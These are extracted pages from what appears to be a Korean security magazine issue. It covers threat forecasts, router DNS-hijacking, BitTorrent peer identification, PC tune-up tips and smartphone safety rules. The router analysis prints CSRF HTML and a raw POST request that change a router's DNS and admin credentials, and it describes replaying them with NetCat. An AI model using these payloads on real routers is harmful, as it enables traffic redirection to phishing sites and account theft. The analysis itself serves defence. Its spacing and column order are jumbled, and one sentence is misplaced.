호스트 (hosts 또는 hosts.ics) 파일변조그리고공유기 DNS 설정변경, 스미싱등다양한방법을사용해왔다. 향후악성코드유포방법에있어서지금보다더사용자가인지하기어려운방법 ( 정상프로그램의업데이트파일변조등 ) 을사용할가능성이높다. 하지만악성코드의전자금융사기수법은지금과크게다르진않을것이며, 호스트파일변조가가장많이사용될것으로보인다. 다양해지는 APT 표적공격기법호기심을자극하는이메일로특정대상을공격하는스피어피싱은올하반기에도지속될것으로보인다. 이러한사회공학적기법에인천아시안게임이나북한이슈등이악용될수있다. 그리고해킹된웹사이트에접속하면제로데이취약점을통해악성코드를감염시키는워터링홀 (Watering Hole) 기법도사용될가능성이있다. 최근에발견된 OpenSSL 취약점인하트블리드 (HeartBleed) 처럼오픈소스의취약점을이용한공격도가능하다. 공격대상도금융기관및일반기업으로확대되고있는추세이므로, 기업의경제적손실이나기밀유출등에항상대비해야한다. IoT 보안문제사물인터넷사용이증가하면서사물인터넷의보안문제도계속발생할것으로보인다. 특히업계에서사물인터넷의표준화작업을시도하 고있는데표준화가성공하고보안에취약한플랫폼이선정된다면앞으로큰재난이발생할수있다. 하반기에바로이런일이발생하지는않겠지만사물인터넷의보안문제는보급과보안정도에따라큰문제가될가능성이높다. 개발사및콘텐츠전송네트워크업체해킹올하반기에는개발사및콘텐츠전송네트워크 (CDN) 업체를해킹하려는시도가증가할것으로예상된다. 많은사람들이개발사에서제공하는소프트웨어를신뢰하지만보안에취약한개발사들이존재한다. 또 CDN 업체를해킹해업로드된파일을악성코드로교체할경우개발사에서보안을철저히해도악성코드에감염된프로그램이고객에게배포될수있다. 따라서개발사와콘텐츠전송네트워크업체의보안강화가필요하다. 국가간사이버분쟁심화최근몇년동안여러주요국가는특정국에서사이버첩보와공격을하고있다고주장하고구체적인증거를내놓기도했다. 미국정부는자국에서사이버스파이행위를한중국인을기소하고용의자를검거하기도했다. 중국정부는미국운영체계와보안제품의사용을중지혹은검토하고있다. 앞으로이런국가간사이버분쟁은계속될것으로보인다. 13
Threat Analysis 공유기해킹 유 무선공유기를이용한 DNS 변조공격분석 전격해부! 공유기 DNS 변조공격의실체 지난 5월, 국내주요포털사이트에접속하면가짜은행사이트로접속되는사례가발생했다. 이는사용자의공유기가해킹된것으로, 공유기의 DNS 주소를변경해사용자들을피싱사이트나파밍사이트로유도하는공격이다. 공유기의 DNS가변조된경우에는사용자들이정상적인주소를입력하더라도악성사이트로이동하게된다. 최근공유기를사용하는이용자들이늘어남에따라이를노리는공격또한증가하고있는추세다. 금융감독원에따르면공유기의 DNS 주소변조공격으로 1,691명의이름과주민등록번호, 휴대전화번호, 거래은행명, 계좌번호, 계좌비밀번호, 보안카드번호등이유출됐다. 이글에서는실제국내주요공유기를대상으로공유기 DNS 변조공격시나리오를살펴본다. 최근유 무선인터넷공유기에설정된 DNS(Domain Name Server) 주소를변조해피싱사이트로유도하는범죄가발생하고있다. 일반적으로공유기 DNS 변조를이용한공격방식은 [ 그림 1] 과같다. 공유기 DNS 공격시나리오 1. CSRF 취약점을이용한 DNS 변조공유기는기본적으로외부에서접근하지못하도록되어있기때문에 DNS 변조공격을하기위해공격자들은 CSRF(Cross-Site Request Forgery) 취약점을이용한다. [ 그림 1] 공유기 DNS 변조를이용한공격 CSRF (Cross-Site Request Forgery) 사이트간요청위조 ( 또는크로스사이트요청위조, 약칭 CSRF 또는 XSRF) 는웹사이트취약점의공격중하나로, 사용자가자신의의지와는무관하게공격자가의도한행위 ( 수정, 삭제, 등록등 ) 를특정웹사이트에요청하게하는공격을말한다. 사이트간스크립팅 (XSS) 을이용한공격이사용자가특정웹사이트를신용하는점을노린것이라면, 사이트간요청위조는특정웹사이트가사용자의웹브라우저를신용하는상태를노린것이다. 즉, 일단사용자가웹사이트에로그인한상태에서사이트간요청위조공격코드가삽입된페이지를열면이후에는사용자의행동과관계없이사용자의웹브라우저와공격대상웹사이트간의상호작용이이루어진다. ( 공격자의의도에따라제 3의웹사이트가추가될수도있다.) * 출처 : 위키피디아 14
DNS 변조와관련된간단한 CSRF HTML 코드는다음과같다. <html> <head></head> <body> <img src="#" onerror=location.replace("http://xxx.xxx.xxx.xxx/cgibin/timepro.cgi?tmenu=netconf&smenu=wansetup&act=save& wan=wan1&ifname=eth1&wan_type=dynamic&allow_private=... 중략... &fdns_static3=&fdns_static4=&sdns_static1=&sdns_ static2=&sdns_static3=&sdns_static4=&mtu.static.eth1=1500") > </body> </html> 또는 <html> <head></head> <body> <img src="#" onmouseover=location.replace("http://xxx.xxx.xxx. xxx/cgi-bin/timepro.cgi?tmenu=netconf&smenu=wansetup&ac t=save&wan=wan1&ifname=eth1&wan_type=dynamic&allow_ private=on&... 중략... &fdns_static1=&fdns_static2=&fdns_ static3=&fdns_static4=&sdns_static1=&sdns_static2=&sdns_ static3=&sdns_static4=&mtu.static.eth1=1500") > </body> </html> [ 그림 2] CSRF HTML 코드예시 [ 그림 4] Ping 명령으로 DDNS 이용공유기확인 해당 DDNS가할당된특정문자열 ( 예 : a.xxxxx.org) 이있는경우 Ping 명령을이용해이를확인할수있다. 외부접속이허용되는옵션이있는경우, 포트스캔을이용해해당포트로접속가능한포트를선정하고 DNS 변조공격에사용할수있는패킷을전송하여응답으로 200 OK 값을받게되면공격에성공한다. 단, 외부접속옵션이허용되어있으면서방화벽설정이열려있다는가정하에발생할수있는시나리오다. 공유기 DNS 변조공격분석국내모업체의각기다른유 무선공유기 3종을테스트한결과, 동일한 CGI 및매개변수를사용하는것을확인하였다. 다음은해당공유기들을이용해테스트공격을수행하여단계별로분석한내용이다. 1. 공격패킷분석우선해당공유기의 DNS 변경요청시발생하는패킷을살펴보자. [ 그림 2] 의 HTML이실행되면이미지파일을로드할수없도록에러를발생시켜 onerror 스크립트가실행되면공유기의 DNS 설정변경을유도하는패킷을발생하도록한다. 해당페이지가 iframe 형태로특정사이트에삽입되어있거나사용자에게해당 HML의접속을유도함으로써 DNS 변조가가능하다. 2. 외부접속공격시나리오 [ 그림 5] DNS 변경시발생하는패킷 [ 그림 5] 는크롬 (Chrome) 웹브라우저에서해당공유기에접속후 DNS 주소를변경하는패킷을전송할경우발생하는 HTTP 통신내용이다. 해당통신과관련된파라미터의내용은 [ 그림 6] 과같다. [ 그림 3] 공유기접속관리화면예시 [ 그림 3] 은국내모업체공유기의접속관리화면으로, 공유기의원격관리포트사용이가능하다. 기본 (Default) 설정은해당기능을사용하지않는것으로되어있으며, 포트또한특정값으로정해져있지않다. 하지만간단한 Ping 프로그램및포트스캔 (Port Scan) 을이용해해당포트값을얻을수있다. 해당공유기업체의경우, 제조사에서 DDNS(Dynamic DNS) 서비스를제공한다. 이를통해생성되는 DDNS 주소는문자열.xxxxxx.org의형태를갖는다. BruteForce를이용해해당주소가 DDNS 서비스를사용하는지의여부를확인할수있다. [ 그림 6] HTTP 통신파라미터 15
[ 그림 6] 에서빨간색으로표시된부분이주목해야할항목들로, 이들 인자의뜻은다음과같다. 해당요청이전송되면 [ 그림 10] 과같이공격완료후화면에나타낼 HTML 코드를받아오는것을확인할수있다. dns_dynamic_ch : 수동 DNS 서버설정을하겠다는표시 fdns_dynamic1~4 : 기본 DNS 서버의 1~4 값 ex)xx.xx.xx.xx sdns_dynamic1~4 : 보조 DNS 서버의 1~4 값 ex)xx.xx.xx.xx 해당인자로구성된패킷이단말기에연결된공유기로전송될경우패킷에설정된파라미터에따라주 DNS 서버및보조 DNS 서버의값이변경된다. 공유기비밀번호가설정되어있지않은경우, 아래와같은짧은 URL 을실행하기만해도공유기의 DNS가변경되는것을확인할수있다. http://19*.***.*.*/***-bin/timepro.cgi?tmenu=netconf&smen u=wansetup&act=save&wan=wan1&ifname=eth1... ( 생략 ) [ 그림 7] 패킷전송이후공유기의 DNS 서버변조화면 2. Netcat을이용한확인 NetCat을사용하기에앞서전송되는패킷을확인하기위해프록시툴인 Burp Suite를이용하여패킷을확인해보자. [ 그림 10] 공격성공후 DNS 에서전송하는 HTML 코드 3. 어드민 (Admin) 계정변경 POST /xxxx/xxxx.cgi HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://xxx.xxxx.xxxx.xxx/xxxx/xxxxxx. cgi?tmenu=sysconf&smenu=login Accept-Language: ko-kr User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Content-Length: 96 DNT: 1 Host: xxx.xxx.xxx.xxx Pragma: no-cache tmenu=sysconf&smenu=login&act=save&new_ login=xxxxxxxx&new_passwd=xxxxxxxxxx&confirm_ passwd=xxxxxxxxxx [ 그림 11] 어드민계정변경요청포스트 (Post) 내용 [ 그림 11] 의데이터를 NetCat으로요청할경우, 기존에관리자 (Admin) 비밀번호가없으면공격자는임의로 ID와비밀번호를변경한다. 이경우피해자는 ID와패스워드를알수없게되므로공유기를리셋 (Reset) 해야만접근이가능하다. 리셋을하지않으면관리자페이지에접근이불가능하기때문에 DNS 변조여부또한확인할수없다. 사용자가 ID와비밀번호를설정해두었을경우에는 Auth 항목이추가된다. [ 그림 8] Burp Suite 를이용한패킷확인 패킷은 [ 그림 8] 과같은형태로발송되며, 이내용을그대로복사하여 NetCat으로요청한다. 요청내용은 [ 그림 9] 와같다. [ 그림 12] ID/ 비밀번호삽입후 Auth 항목이추가된화면 [ 그림 9] NetCat 을이용한공유기 DNS 변경패킷전송 이때추가되는 Authorization 패킷은 Base64 로 ID:Password의값을갖는다. 16
[ 그림 13] Base64 Decoding 을이용한 Auth 복호화화면 펌웨어업데이트등사용자주의가최우선최근유 무선공유기를노리는공격이증가함에따라이에대응하기위한공유기제조사및보안업체들의움직임이발빠르게이어지고있다. 그러나이러한공격을예방하기위해서는무엇보다공유기사용자의주의가필요하다. 공유기의펌웨어를최신의상태로유지하는것이기본이자가장중요하며 관리자 ID 및비밀번호를미리설정해두고 가급적이면공유기의외부접근을허용하지않는것으로설정하는것이바람직하다. 또한최신무선공유기는대부분공유기자체에 VPN 기능이탑재되어있다. 잠재적인위협을방지하기위해서는 VPN 기능을사용하지않는것을권장한다. 무선공유기의비밀번호를설정하는것도잊지말아야한다. 17
Tech Report BitTorrent Analysis 1 부 _BitTorrent 기초분석 P2P 기술의그림자, 불법파일공유를막아라 P2P는인터넷을통한파일공유기술로, 다수의클라이언트간에파일을공유할때매우유용하게사용되는기술이다. 그러나현재 P2P 기술의장점인뛰어난성능과빠른속도가파일의불법공유에악용되면서지적재산권침해등사회적문제가되고있다. 기존에는 P2P 서버를중지시킴으로써파일의불법공유확산을차단할수있었으나최근서버를필요로하지않는새로운방식의 P2P 기술이등장하면서 P2P 서버를중지시키는것만으로는파일의불법공유를막기어렵게되었다. 파일의불법공유를막기위해공유자들에대한직접적인제재가필요한시기가된것이다. 월간안 에서는 2회에걸쳐새로운방식의 P2P 기술중가장활발하게이용되고있는비트토렌트 (BitTorrent) 에대해알아보고불법파일공유에참여한이들의정보를확보할수있는방안을살펴보고자한다. < 연재목차 > 1 부 _BitTorrent 기초분석 ( 이번호 ) 2 부 _BitTorrent, 공유과정실전분석 (2014 년 9 월호 ) 저작물 이란어떤아이디어를독자적으로표현한창작물을말한다. 지적재산권은저작자의저작물창조에대한의지및생산력증진을위해저작자에게주어지는권리이다. 그러므로저작물을저작자의동의없이업로드할경우, 이는저작자의권리중복제권과전송권을침해하는행위이며이를다운로드하는것은저작자의복제권을침해하는행위이다. 저작권법제 136조에의하면, 저작물을무단으로복제하여영리행위를한경우 5년이하의징역또는 5천만원이하의벌금에처하거나이를병과할수있다. 과거에 P2P를통해불법공유가발생한경우, 법원은 P2P 서비스제공자, 사이트운영자들에게기여책임및대위책임이있다고판결하였다. 이에대한처벌로해당사이트를폐쇄하고서비스제공을중지하도록명령하였다. 그러나최근많이사용되고있는비트토렌트 (BitTorrent) 는기존의 P2P와구조가다르기때문에기존판결이적용되기어려운형태다. 그러다보니비트토렌트를이용한파일의불법공유는지속적으로늘어나는추세이다. 이글에서살펴볼안드로이드기반스마트폰의문자메시지는백업기능으로데이터추출이가능하 18
므로, 이를이용하여문자메시지데이터베이스를추출하여복구과정을수행해본다. P2P의진화최신 P2P 프로그램인비트토렌트를이해하기위해서는먼저 P2P가어떻게진화해왔는지살펴볼필요가있다. P2P(Peer-to-Peer) 는개별클라이언트들의참여로구성되는통신망을구현하는기술이다. P2P 기술은통신에참여하는각클라이언트들이데이터를효율적으로빠르게주고받을수있는방향으로발전해왔다. P2P의유형은크게 1세대 P2P ~ 4세대 P2P로나뉜다. 1세대 P2P는 중앙서버-다수의클라이언트 형태로구성되어있다. 중앙서버에서는각클라이언트들에대한정보를가지고있으며, 이정보를클라이언트들에게제공함으로써클라이언트간에원활한통신을가능하게한다. 냅스터 (Napster), 소리바다 (soribada) 등 mp3 파일공유프로그램이대표적인 1세대 P2P라할수있다. 1세대 P2P의네트워크는서버상태에의존적인구조이기때문에서버에문제가생길경우클라이언트들은원활하게데이터를공유할수없게되는단점이있다. 3세대 P2P부터는파일을일정한단위의조각으로나누고클라이언트간에서로필요한조각을주고받는형태로공유가이루어지게되었다. 이러한방식을통해데이터의공유속도가향상되었으며클라이언트간에데이터가더욱효율적으로오갈수있게되었다. 당나귀 (edonkey), 이뮬 (emule) 등이 3세대 P2P라할수있다. [ 그림 3] 3 세대 P2P 당나귀 (edonkey) 와이뮬 하이브리드 P2P, 비트토렌트 [ 그림 4] 비트토렌트로고 4세대 P2P로불리는비트토렌트는앞선 P2P들의특징을모두포함하고있다. 서버와유사한기능을제공하는트래커 (Tracker) 도존재한다. 트래커는다른클라이언트에대한정보및공유되는데이터에대한간단한정보만을보유하고있으며클라이언트들이데이터공유에참여하는과정에서트래커에필요한정보를 HTTP GET 형태로요청하면그에대한응답으로정보를보내준다. 클라이언트는트래커로부터전달받은타클라이언트에대한정보를토대로데이터공유네트워크에참여한다. [ 그림 1] 1 세대 P2P 냅스터와소리바다 이후등장한 2세대 P2P는중앙서버의역할을축소하거나제거하고, 클라이언트들간에네트워크를형성하여데이터의공유를가능하게하는형태로발전하였다. 프리넷 (Freenet), 그누텔라 (Gnutella) 등이이에속한다. 그러나트래커가비트토렌트를통한데이터공유의필수요소는아니다. 비트토렌트는 DHT라는내부알고리즘을통해데이터공유에참여하고있는피어 (Peer, 즉클라이언트 ) 들로부터직접피어들에대한정보와네트워크에대한정보를제공받음으로써공유네트워크에속하여데이터를공유하는것이가능하다. [ 그림 2] 2 세대 P2P 프리넷과그누텔라 [ 그림 5] 비트토렌트네트워크구조 19
비트토렌트는공유파일을일정한크기의조각인 Piece로분할하고각피어들간에 Piece를주고받게함으로써빠르고효율적으로파일이공유될수있게하였다. 또한각피어가보유하고있는 Piece 목록정보를네트워크상에서공유하게함으로써각피어들이원하는 Piece 를빠르게찾아갈수있게하였다. 토렌트파일분석토렌트 (Torrent) 파일은공유대상이되는파일의이름, 파일전체크기, 파일의해시값 (hash value), 트래커, Piece 등에대한정보를갖고있으며그내용은 Bencoding 형태로구성되어있다. Bencoding 은바이너리인코딩 (Binary encoding) 의약자로, 비트토렌트관련파일에서데이터를저장하거나공유네트워크상에서정보를주고받을때사용하는형식이다. Bencoding의구조는 [ 표 1] 과같다. [ 그림 6] 토렌트파일예시 1 (announce, announce-list) 유형설명구조예시 Strings 문자열 [ 길이 ]:[ 데이터 ] 7:network Integers 숫자 i[ 숫자 ]e i3e Lists 다수 l[strings or ingegers]e l8:advanced7:networke Dictionaries Key-value d[keys][values]e d3:onei1e3:twoi2e5:threei3 e4:fouri4ee [ 표 1] Bencoding 구조 토렌트파일은다음의정보들을 Bencoding의디렉터리 (Directory) 형식에맞춰갖고있다. Key 필수여부 설명 Info O 공유파일에대한정보를 dictionary 포맷으로가지고있음 -length O 파일의총크기 -md5sum X 파일에대한 MD5 해시값 -name O 파일이름 -piece length O Piece 의크기 ( 일반적으로 256KB) [ 그림 7] 토렌트파일예시2 (comment, created by, createdate, files, length, path) -pieces O 각 Piece 들에대한 SHA1 해시값목록 ) files -path O O 공유파일이여러개인경우, Dictionaries files 밑에각파일별로 length, md5sum, name 등의정보가담기게됨공유파일이여러개인경우, 각파일의이름은 Dictionaries files 밑의 path 부분에담기게됨 Announce O 트래커목록 Announcelist X 백업트래커 (Backup Tracker) 목록 [ 그림 8] 토렌트파일예시 3 (piece length, pieces) Create date X 토렌트파일생성시각 (Unix epoch format) Comment X 코멘트 ( 토렌트파일생성자가자유롭게작성가능 ) Created by X 토렌트파일생성에이용된프로그램정보 (BitTorrent 클라이언트프로그램이름및버전정보등 ) 비트토렌트파일공유자정보확보방법비트토렌트클라이언트프로그램에서토렌트파일을실행하면공유가시작된다. [ 그림 9] 는비트토렌트클라이언트프로그램중하나인 utorrent에서테스트용토렌트파일을실행시켰을때의화면이다. [ 표 2] 토렌트파일의정보 토렌트파일을헥사뷰어로열어보면다음의그림들과같이 Bencoding 형태로다양한정보들이들어있음을확인할수있다. [ 그림 9] 파일공유가진행중인 utorrent 프로그램화면 20
[ 그림 9] 의프로그램화면우측하단에서현재실시간으로파일의 Piece를주고받는피어들에대한정보를확인할수있다. [ 그림 9] 의예로든화면에서는피어의수가 5개정도로보이지만실제로파일공유네트워크에는훨씬더많은피어들이존재하고있다. 이들피어에대한정보는두가지방법을통해확인할수있다. 1. 트래커로부터전달받은 HTTP Response 패킷분석트래커는각파일별로공유네트워크에참여하고있는피어들에대한목록을가지고있다. 따라서새로운피어가해당목록을 HTTP GET 형태로요청하면이에대한응답으로현재공유에참여하고있는피어들에대한목록을보내준다. 피어들에대한정보를갖고있는트래커에공유되고있는파일의해시정보에대해 HTTP GET 요청을보내고, 이에대한응답으로받은 HTTP Response 패킷에서해당파일을공유하고있는피어들에대한정보를추출하는것이다. [ 그림 12] 피어목록정보가담긴패킷 ( 네트워크상의다른피어로부터전달받은정보 ) 패킷의데이터부분에는 [ 그림 12] 와같이피어들의 IP와포트정보가 6바이트씩연달아들어있기때문에 HTTP 패킷의 Bencoding 영역내에키 values 가존재할경우, 해당키에대응되는 value 부분으로부터공유네트워크를구성하는피어들에대한정보를수집할수있다. 지금까지대표적인 P2P 프로그램인비트토렌트의동작방식을살펴보고비트토렌트의두가지패킷유형을분류해 Bencoding 영역에서피어의 IP와포트정보를추출함으로써파일공유에참여한사람들의정보를추출하는방법을알아보았다. 다음호에서는비트토렌트의파일공유과정과관련패킷에대해상세히분석하고파일공유참여시사용자의 PC에남는흔적을분석하는방법을살펴보도록하겠다. [ 그림 10] 피어목록정보가담긴패킷 ( 트래커로부터전달받은정보 ) 패킷의데이터부분에는 [ 그림 10] 과같은형태로피어들의 IP와포트정보가 6바이트 (byte) 씩연달아들어있다. 따라서 HTTP 패킷의 Bencoding 영역내에키 peers 가존재할경우해당키에대응되는 value 부분으로부터공유네트워크를구성하는피어들에대한정보를수집할수있다. 2. 피어로부터전달받은패킷분석피어들은각파일공유네트워크에참여하고있는피어들에대한목록을가지고있으면서서로보유하고있는피어목록을주고받음으로써주기적으로정보를갱신한다. 구체적으로는, 피어가다른피어에게관심파일의해시값과 get_peers 메시지가담긴 UDP 패킷을보내면서피어목록을요청하는것이다. 해당 UDP 패킷을받은피어는자신이보유하고있는피어들의목록을응답으로보내준다. < 용어정리 > 1. BitTorrent 클라이언트프로그램 - BitTorrent 기술을이용하여각사용자들이데이터의공유가가능하도록도와주는프로그램 - 자주사용되는프로그램으로 utorrent, BitComet 등이있음 2. Torrent 파일 -.torrent 확장자를갖는 Torrent 파일을 BitTorrent 클라이언트프로그램에서실행함으로써파일의공유에참여하는것이가능함 - Torrent 파일은공유대상이되는파일의이름, 파일전체크기, 파일의해시값, Tracker 등에대한정보를가지고있음 3. 마그넷링크 - Torrent 파일이없더라도파일의공유가가능하도록만든웹 url 4. Tracker - 공유되고있는파일들의이름, 파일크기, 파일의해시값등파일에대한메타정보와해당파일을공유하고있는클라이언트들에대한정보를가지고있음 - 공유에참여하고자하는클라이언트들에게필요한정보를제공해줌 5. Peer - 본래 또래, 동료 라는의미의영어단어로, P2P 기술과관련해파일의공유에참여하고있는클라이언트를의미함 6. Seeder - 공유파일전체를보유하고있으면서, Peer 들에게파일을업로드하는 Peer들 - 파일의최초유포자, 또는파일다운로드를 100% 완료한 Peer들이여기에속함 [ 그림 11] get_peers 메시지가담긴피어목록요청패킷 7. Piece - Peer 간의파일데이터전송단위 - BitTorrent는파일을일정한크기의 Piece로나누고, Peer와 Peer 간에서로가보유하고있는 Piece를주고받게하는식으로파일의공유가이루어지게함 21
IT & Life 느려진 PC 빠르게사용하는방법 자꾸만느려지는 PC. 불필요한프로그램이많지않은지, 바이러스나악성코드에감염된것은아닌지체크해봐야할것이한둘이아 니지만 PC 속도를조금은빠르게하려면꼭한번은필요한작업이다. 몇가지기본적인작업을통해쉽게점검해볼수있는방법을 소개한다. 단윈도 7 에해당되므로윈도버전을확인하고실행해볼것을권하며 PC 성능과사양에따라효과의차이가있다. 바탕화면정리하기 PC가느려졌다고생각한다면먼저바탕화면의아이콘상태를확인해보자. 너무많은아이콘이바탕화면에있는것은아닌지, 문서나용량이큰이미지파일을저장해둔것은아닌지. 바탕화면에아이콘은 2줄이적당하며그이상이되면프로그램을실행하는데영향을준다. 또한바탕화면에는폴더아이콘은놓지않고로컬디스크 (C 드라이브 ) 가아닌다른드라이브에저장할것을권한다. 쿠키삭제인터넷쿠키삭제가별거아니라고생각하는사람들이많다. 사이트방문시다운받은사진이나파일등은임시인터넷파일에쌓인다. 이기록은접속했던사이트에재접속하면이전의정보를읽어와해당사이트를여는데속도가빨라질뿐이지인터넷속도자체는쌓였던임시인터넷파일과쿠키로느려질수도있다. 따라서그동안정리하지않았던임시인터넷파일과쿠키를정리하면인터넷속도가조금은빨라질것이다. [ 인터넷옵션 ] [ 삭제 ] [ 검색기록삭제 ] 쿠키및웹사이트데이터체크후삭제버튼클릭디스크정리로불필요한파일삭제하기디스크정리는하드디스크에서불필요한파일수를줄여디스크공간을확보하고 PC 속도개선에도움을준다. 디스크정리를하면임시파일제거, 휴지통비움등더이상필요하지않은여러가지시스템파일과기타항목들을제거할수있다. 방법도간단하다. [ 시작 ] 프로그램및파일검색창에 디스크정리 라고입력하면 [ 디스크정리 : 드라이브선택 ] 창이뜬다. 드라이브를순서대로선택해서확인을눌러주면디스크정리가된다. 디스크정리를통해해당드라이브에서최대 MB~GB의디스크공간을확보할수있다는메시지가뜬다. 삭제할파일을확인한후체크하고확인을눌러주면된다. C 드라이브부터 D, E 등순서대로진행하면된다. 조각난하드디스크조각모음하기디스크정리가끝났다면디스크조각모음을해보자. 조각난하드디스크는추가작업을수행하기때문에 PC 성능을저하시킬수있다. 디스크조각모음은조각난데이터를다시정렬하여디스크및드라이브를효율적으로사용할수있어많은사람들이 PC 성능을위해자주이용하는방법이다. [ 제어판 ] [ 시스템및보안 ] [ 관리도구 ] [ 하드드라이브조각모음 ] 또는 [ 시작 ] 프로그램및파일검색창에서 디스크조각모음 을입력한후검색하면바로 [ 디스크조각모음 ] 으로이동한다. 22
유의해야할점은 PC 성능이떨어진다고해서무조건디스크조각모음을해야하는것은아니다. 디스크조각모음을하기전에조각모음을할디스크를선택해서디스크조각모음이필요한지디스크분석을해야한다. 윈도에서디스크분석이완료되면마지막실행열에서디스크의조각화비율을확인할수있다. 비율이 10% 를넘으면디스크조각모음을해야한다. 단, 다른프로그램에서디스크를이미단독으로사용하고있거나디스크가 NTFS 파일시스템, FAT 또는 FAT32 이외의다른파일시스템을사용하여포맷한경우에는조각모음을실행할수없다. 시작프로그램정리하기윈도시작프로그램은윈도가시작될때동시에실행되는프로그램이다. 시작프로그램이많으면 PC가부팅되는시간도그만큼오래걸린다. 시작프로그램을정리해주면부팅속도도좀더빨라지고 PC 성능도조금은나아지는것을느낄수있다. [ 시작 ] 프로그램및파일검색창에 msconfig 를입력하면 [ 시스템구성 ] 창이뜬다. 시작프로그램탭을클릭하면시작항목에대부분체크돼있는것을확인할수있다. 체크된프로그램이어떤것인지확인한후필요하다고판단되는프로그램만체크하고그외의프로그램은체크해제하면된다. PC를재부팅하면변경이적용된것을알수있다. 불필요한서비스항목제거 [ 시스템구성 ] [ 서비스 ] 에서불필요한서비스항목을제거해준다. 이때 모든 Microsoft 서비스숨기기 에체크한뒤나머지서비스는체크해제하면된다. 꼭필요한서비스항목은그대로두고적용해야한다는점을염두에둬야한다. 바이러스검사와레지스트리정리, PC 최적화까지바이러스나악성코드감염은 PC가느려지는원인이되기도한다. 악성코드를비롯해외부위협요소가많다보니상호보완차원에서바이러스프로그램을 2개이상설치해서사용하는사람도많다. 각각프로그램마다장단점이있지만가급적한개의프로그램만사용할것을권한다. 제품간충돌우려는물론시스템성능이저하되기도한다. 안랩 V3라이트는악성코드감지는물론사용자의 PC 최적화에도움을준다. PC 최적화기능을사용하면레지스트리청소, 시스템내휴지통비우기, 시스템임시파일정리등인터넷쿠키정리까지해준다. 사용자가원하는항목에체크해서최적화시키면된다. [V3] [ 도구 ] [PC 최적화 ] 위의방법외에도안랩 PC 주치의의도움을받아보자. PC 주치의는안랩의 PC전문가들이 PC에발생한다양한문제에대해원격지에서문제가있는 PC로접속하여해결해주는 V3 365 클리닉의원격지원서비스다. 안랩 PC 주치의서비스는유료다. 23
IT & Life 스마트폰보안수칙, 이것 만은지키자! 외부위협에노출된스마트폰을안전하게사용하려면 절대 하지말아야할것이있다. 호시탐탐스마트폰사용자를노리고있는해 커로부터안전하기위해서는어떻게해야하는지알아보자. 주부 A씨는아이용품부터생활용품까지스마트폰으로쇼핑을즐기는 모바일쇼핑족 이다. 웬만한소셜커머스앱을두루섭렵하고있는그녀이기에매일따끈따끈한쇼핑정보소식도스마트폰으로받아보고있다. 또발품을팔필요없이가격비교사이트에서제품을검색하면최저가사이트로안내해주니얼마나편리한가. 여기에주부 A씨는스마트폰으로모바일뱅킹도이용한다. 평소건망증이있다보니스마트폰에거래은행의보안카드를사진으로저장해두었다. 급하게인터넷뱅킹을해야할때언제어디에서나와이파이만연결되면스마트폰으로바로이용할수있어 A씨에게모바일뱅킹은없어서는안될존재이다. 모바일쇼핑, 모바일뱅킹은언제어디서나이용할수있다는편리함때문에많은이들이애용하고있다. 하지만해커들은모바일족을호시탐탐노리고있다는점에스마트폰사용자들은주목해야한다. 바로 스미싱 이다. 초기스미싱은이전에유출된개인정보와스미싱을통해탈취한통신사정보, 인증용문자메시지를결합해소액결제를유도하는형태였다. 하지만, 최근에는쇼핑등서비스제공업체들의사이트와구별하기어려운유사한가짜사이트 ( 파밍사이트 ) 를제작하는등고도화된스미싱수법이나타나고있다. 이를통해공인인증서, ID 및비밀번호, 통신사정보, 문자메시지등금융거래및결제에필요한모든정보를탈취해간다. 뿐만아니라주소록정보까지도유출해스미싱수신자들을기하급수적으로늘려가는등대형보안사고의시작점으로변하고있다는것이문제다. 따라서해커들의교묘하고고도화된사기수법에넘어가지않고안전하게모바일쇼핑을즐기기위해서는주부 A씨처럼보안카드등매우중요한개인금융정보를사진이나메모등을스마트폰에저장하는일은절대하지말아야한다. 또한외부에서스마트폰으로와이파이를이용할때는확인되지않는공유기접속도가급적자제해야한다. 특히많은사람들이사용하는공개된와이파이존에서는금융거래는하지않고 3G로전환하여사용할것을권한다. 그밖에도안랩이항상강조하고있는스마트폰보안수칙은 문자메시지나 SNS(Social Networking Service) 등에포함된 URL 실행을자제하고만약수상한 URL을실행하거나앱을설치했을때는모바일전용보안프로그램을통해스마트폰을검사해야한다. 반드시모바일전용보안앱 (V3 Mobile 등 ) 이나스미싱탐지앱을설치하고자동업데이트등으로항상최신엔진을유지해야한다. 또한, 보안앱으로주기적인스마트폰검사 공식마켓이외의출처의앱설치방지를위해 알수없는출처 [ 소스 ] 의허용금지설정을하고, 공식마켓에도악성앱이등록되어있을수있어평판정보를반드시확인해야한다. 안전한모바일쇼핑을위한보안수칙 1. 문자메시지나 SNS(Social Networking Service) 등에포함된 URL 실행자제 2. 모바일전용보안앱 (V3 Mobile 등 ) 이나스미싱탐지앱을설치하고자동업데이트등으로최신엔진유지및주기적인검사 3. 공식마켓이외의출처의앱설치방지를위한 알수없는출처 [ 소스 ] 의허용금지설정 - 공식마켓에도악성앱이등록되어있을수있어평판정보를반드시확인하자! 4. 스마트폰으로와이파이 (Wi-Fi) 이용시외부에서확인되지않는공유기접속자제 - 개인공유기의비밀번호도반드시유추하기어려운 문자 + 숫자 로설정해혹시모를공격들을사전에차단시켜야한다. 5. 보안카드등매우중요한개인금융정보를사진혹은메모등을스마트폰에저장해두는것은절대금지 24
AHNLAB NEWS 안랩, 전사교육프로그램개편 안랩이변화하는기업환경에맞추어교육프로그램의새로운변화를시도한다. 안랩은 2013년에시범운영했던직위별맞춤형교육프로그램인 직위별스쿨 과임직원참여형조직활성화프로그램인 안랩함성 을정규프로그램으로정착시키고, 기존정규프로그램과통합하여 안랩스쿨 이라는전사교육프로그램으로개편한다. 이에따라안랩은 핵심가치내재화와목표공유, 명사특강등을진행하는 점프업 각직위별공통역량과직무특성에맞춘 직위별스쿨 구성원들의멤버십강화를위한 안랩함성 등세분화된 교육프로그램으로전임직원의경쟁력향상과이를통한기업의역량강화에주력한다. 또한, 이과정들을묶어 안랩스쿨 이라는브랜드로통칭해안랩을대표하는전사교육프로그램으로자리매김시켜나간다는계획이다. 안랩권치중대표는 기업의힘은임직원의역량에서나온다. 안랩은새로운교육프로그램으로임직원개개인의역량을강화시켜 끊임없는연구개발로함께사는사회에기여한다 는안랩의존재의미를실천해나갈것이다 고말했다. 안랩, 2014 지배구조우수기업 우수상 수상 안랩이지난달 3일서울여의도한국거래소 (KRX) 국제회의장에서열린한국기업지배구조원주최 2014 지배구조우수기업 시상식에서 우수상 을수상했다. 